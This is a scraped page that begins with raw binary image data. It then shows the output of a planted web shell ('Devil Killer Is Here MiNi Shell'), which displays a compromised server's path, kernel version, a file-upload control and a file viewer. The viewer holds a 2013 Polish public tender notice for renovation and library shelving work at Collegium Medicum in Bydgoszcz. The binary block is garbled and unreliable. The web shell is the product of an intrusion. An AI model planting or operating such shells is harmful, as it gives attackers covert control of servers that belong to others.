JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130614/112759-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Remont pomieszczeń oraz dostawa i montaż
regałów bibliotecznych w kompleksie obiektów Collegium Medicum przy ul. M. Curie- Skłodowskiej 9 w
Bydgoszczy.</b><br>
<b>Numer ogłoszenia: 112759 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Mikołaja Kopernika w Toruniu  Collegium Medicum im. Ludwika Rydygiera w Bydgoszczy , ul. Jagiellońska 13-15, 85-067 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5853698, faks (052) 585 36 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cm.umk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń oraz dostawa i montaż
regałów bibliotecznych w kompleksie obiektów Collegium Medicum przy ul. M. Curie- Skłodowskiej 9 w
Bydgoszczy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1Zakres przedmiotu
zamówienia obejmuje remont pomieszczeń w budynku diagnostycznym Szpitala Uniwersyteckiego
(jednostki: Katedra i Zakład Diagnostyki Laboratoryjnej; Katedra i Zakład Farmakologii i Terapii), jak
również dostawę i montaż regałów bibliotecznych w magazynie książek oraz remont pomieszczeń
Biblioteki Medycznej w budynku audytoryjnym. 2.2Prace remontowe w pomieszczeniach ww. jednostek
polegać będą na: a)przygotowaniu pomieszczeń do wykonania prac remontowych (wyniesienie lub
demontaż mebli i zbędnych elementów wyposażenia, zabezpieczenie okien, posadzek bądź ścian przed
uszkodzeniami - w zależności od rodzaju wykonywanych prac) b)demontażu i montażu ścianek działowych
z różnych materiałów ( pustaki gazobetonowe, cegła pełna, płyty gipsowo- kartonowe na ruszcie
metalowym), c)skuciu fundamentu betonowego, d)zabezpieczeniu szybu wentylacyjnego - zabudowa jednostronna z płyt gipsowo- kartonowych na ruszcie metalowym, e)wymianie wykładzin ściennych i
podłogowych z różnych materiałów (płytki ceramiczne, wykładziny dywanowe PCV, parkiet, panele
podłogowe itp.), f)ułożeniu płytek podłogowych pod natryskiem z zachowaniem odpowiednich spadków
odwadniających oraz montażu wpustu liniowego z wykonaniem odpowiednich izolacji przeciwwilgociowych
zgodnie z zaleceniami producenta, g)wymianie tynków wewnętrznych cementowo- wapiennych na
ścianach oraz wykonaniu gładzi gipsowych na sufitach, h)wykonaniu odpowiednich izolacji
przeciwwilgociowych na posadzce i na ścianach w pomieszczeniach, i)gruntowaniu wszystkich podłoży w
pomieszczeniach objętych zakresem przedmiotu zamówienia, j)malowaniu ścian i sufitów farbami
emulsyjnymi lateksowymi (rodzaj farby należy odpowiednio dobrać w zależności od funkcji pomieszczenia,
a kolor ustalić z jego użytkownikiem), k)malowaniu stolarki drzwiowej farbą olejną, l)montażu sufitów
podwieszanych o konstrukcji metalowej z wypełnieniem płytami gipsowo- kartonowymi, m)demontażu,
montażu bądź wymianie umywalek, zlewozmywaków, ustępów i pisuarów, jak również baterii
umywalkowych lub zlewozmywakowych jednouchwytowych, n)wymianie przewodów instalacji c.o. oraz
grzejnika na łazienkowy drabinkowy, o)wymianie przewodów instalacji elektrycznych, opraw
świetlówkowych, gniazd, wyłączników oraz wentylatorów, p)demontażu, montażu bądź wymianie
przewodów instalacji elektrycznych, q)wymianie kratek wentylacyjnych, likwidacji lub wymianie kratek
kanalizacyjnych oraz drzwiczek rewizyjnych, r)malowaniu rur instalacyjnych oraz grzejników farbami
olejnymi, s)montażu luster (na klej, licowanych z glazurą ścienną), t)montażu odbojnic drewnianych,
wykonaniu zabudowy grzejnika oraz wymianie tapicerki na drzwiach wewnętrznych - wygłuszenie drzwi, u)
wykonaniu izolacji z płyt styropianowych gr 50mm kanału technologicznego o powierzchni do 2m2, v)
demontażu rur stalowych ocynkowanych i PCV, w)demontażu i montażu izolacji termicznej, x)montażu
przewodów PP i PCV, y)montażu kanałów wentylacji grawitacyjnej SPIRO lub prostokątnych, z)demontażu,
montażu lub wymianie ościeżnic oraz skrzydeł drzwi wewnętrznych (wyposażonych w samozamykacz -
zgodnie z informacjami zamieszczonymi w załączniku nr 9 do SIWZ), aa)wymianie okien wraz z
parapetami zewnętrznym - 6 szt., bb)wykonanie izolacji ścian zewnętrznych z przygotowaniem podłoża, cc)
wykonanie opaski z kostki betonowej, dd)wywiezieniu i utylizacji gruzu oraz innych materiałów
porozbiórkowych, ee)wykonaniu prac porządkowych (w tym wniesienie, montaż mebli i elementów
wyposażenia, oczyszczenie okien, drzwi posadzek i ścian oraz odtworzenie stanu pierwotnego w
przypadku uszkodzeń powstałych na skutek wykonywanych prac). 2.3Wyposażenie remontowanych
pomieszczeniach ww. jednostek polegać będzie na: a)dostawie i montażu mebli laboratoryjnych do sali
ćwiczeń nr 1033, jak również zabudowy meblowej do sanitariatów oraz zaplecza kuchennego, b)dostawie i
montażu podajników do mydła w płynie oraz papieru do rąk c)dostawie i montażu suszarek do rąk, d)
dostawie i montażu uchwytów do papieru toaletowego, e)dostawie i montażu wieszaka na ręczniki.
2.4Dostawa i montaż regałów bibliotecznych w magazynie książek Biblioteki Medycznej polegać będzie na:
a)sporządzeniu planu rozmieszczenia regałów, w uzgodnieniu z Zamawiającym, przy założeniu ilości półek
użytkowych nie mniejszej niż 650 mb., b)dostawie regałów przesuwnych, których szczegółowy opis zamieszczony został w załączniku nr 9 do SIWZ, c)montażu regałów w magazynie książek wraz z
dostosowaniem pomieszczenia zgodnie z odpowiednimi wymogami technicznymi tj. przygotowanie podłoża
oraz właściwe rozmieszczenie oświetlenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.40.00.00-1, 45.21.23.30-8, 39.13.11.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przed upływem terminu (łącznie
z podaną godziną) składania ofert w wysokości 9.000,00 zł (słownie: dziewięć tysięcy złotych 00/100 zł)
Szczegółowe informacje dotyczące wadium znajdują się w pkt 3 części V SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku jeżeli Wykonawca wykaże się w okresie ostatnich
pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy w tym okresie wykonaniem robót budowlanych to jest: wykonaniem jednej roboty
budowlanej polegającej na wykonaniu prac remontowych w budynkach użyteczności publicznej o
wartości minimum 350.000,00 zł brutto oraz wykonaniem jednej roboty budowlano- montażowej
polegającej na wykonaniu prac montażowych w pomieszczeniach archiwalnych bądź
magazynowych o wartości minimum 60.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca dysponuje lub będzie
dysponować następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia i
będą odpowiedzialne za kierowanie robotami budowlanymi tj.: -robotami budowlanymi-min. 1
osoba musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w
specjalności konstrukcyjno- budowlanej zgodnie z art. 13 ust. 1 pkt. 2) i art. 14, ust. 1 pkt. 2) oraz
art. 12 ust. 1 pkt. 7 Ustawy prawo budowlane (Dz. U. z 2010 r. ,Nr 243 poz. 1623 ze zm.);
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień
budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw
Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.
12a oraz innych przepisów ustawy prawo budowlane oraz ustawy o zasadach uznawania
kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Za najważniejsze roboty Zamawiający uznaje wyłącznie roboty budowlane polegające na
wykonaniu prac remontowych w budynkach użyteczności publicznej o wartości minimum
350.000,00 zł brutto oraz roboty montażowo-budowlane polegające na wykonaniu prac montażowych w pomieszczeniach archiwalnych bądź magazynowych o wartości minimum
60.000,00 zł brutto, bez względu na fakt, czy niezależnie od realizacji tych robót wykonawca w
ramach realizacji zamówienia wykonywał również inne zobowiązania (np. projektowanie, uzyskanie
pozwolenia na budowę, wyposażenie, uzyskanie pozwolenia na użytkowanie itp.); Dowodami, o
których mowa powyżej są: - poświadczenie; - inne dokumenty - jeżeli z uzasadnionych przyczyn o
obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa
powyżej. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane
wskazane w Wykazie, o którym mowa powyżej, zostały wcześniej wykonane, Wykonawca nie ma
obowiązku przedkładania dowodów, o których mowa powyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy,
którego wzór stanowi załącznik nr 3 do SIWZ. 2)Jeżeli, w przypadku wykonawcy mającego siedzibę na
terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mają
miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich
zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące
niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert z tym że w przypadku gdy w miejscu
zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym
oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu
zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem. 3)Jeżeli w kraju
miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie
wydaje się dokumentów, o których mowa w pkt. 2.4. części III SIWZ, zastępuje się je dokumentem
zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,
złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego
lub gospodarczego odpowiednio, kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma
siedzibę lub miejsce zamieszkania, lub przed notariuszem. 4)W przypadku wątpliwości co do treści
dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca
zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o
udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu. 5)Wartości podane w
dokumentach w walutach obcych, celem oceny spełnienia warunku udziału w postępowaniu, zostaną przeliczone na złote wg kursu średniego danej waluty do złotego, publikowanego w tabeli kursów średnich
Narodowego Banku Polskiego (NBP), obowiązujących na dzień publikacji ogłoszenia o niniejszym
zamówieniu w BZP, z dokładnością do czterech miejsc po przecinku. 6)Wykonawcy wspólnie ubiegający
się o udzielenie zamówienia, dokumenty wymienione w pkt 2.2.-2.5. oraz 2.8. części III SIWZ każdy z
Wykonawców składa osobno, tj. w przypadku Wykonawców występujących wspólnie na podstawie art. 23
ust. 1 ustawy, każdy z Wykonawców musi samodzielnie wykazać brak podstaw do wykluczenia z
postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy. 7)W
przypadku ewentualnych podwykonawców tj. podmiotów, które będą uczestniczyły w wykonaniu
zamówienia należy dołączyć wykaz części zamówienia, których wykonanie Wykonawca zamierza
powierzyć podwykonawcom - wzór stanowi załącznik nr 4 do SIWZ. Brak informacji, o której mowa w
zdaniu poprzednim będzie uznany za stwierdzenie samodzielnego wykonania zamówienia przez
Wykonawcę, który złoży ofertę. 8)W przypadku Wykonawców wspólnie ubiegających się o udzielenie
zamówienia, do oferty musi być załączony dokument ustanawiający pełnomocnika Wykonawców
występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść
pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest
upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej
notarialnie za zgodność z oryginałem. Jeżeli oferta tych Wykonawców zostanie wybrana, Zamawiający
przed zawarciem umowy w sprawie zamówienia publicznego, może zażądać umowy regulującej
współpracę tych Wykonawców. 9)Na podstawie art. 26 ust. 2b ustawy Wykonawca może polegać na
wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub
zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie
dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu
pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres
korzystania z nich przy wykonywaniu zamówienia. 10)Zamawiający dokona oceny spełniania warunków
udziału w postępowaniu na podstawie treści i informacji zawartych w oświadczeniach i dokumentach
załączonych do oferty. 11)Ocena spełniania warunków nastąpi wg formuły: spełnia - nie spełnia. 12)
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: a)winni ustanowić pełnomocnika do
reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i
zawarcia umowy w sprawie zamówienia, b)ponoszą solidarną odpowiedzialność za wykonanie umowy i
wniesienie zabezpieczenia należytego wykonania umowy, c)warunki określone przez Zamawiającego
mogą spełniać łącznie, z zastrzeżeniem oceny niepodlegania wykluczeniu z postępowania na podstawie
art. 24 ust. 1 ustawy, w związku z czym każdy z Wykonawców musi samodzielnie wykazać brak podstaw
do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust.
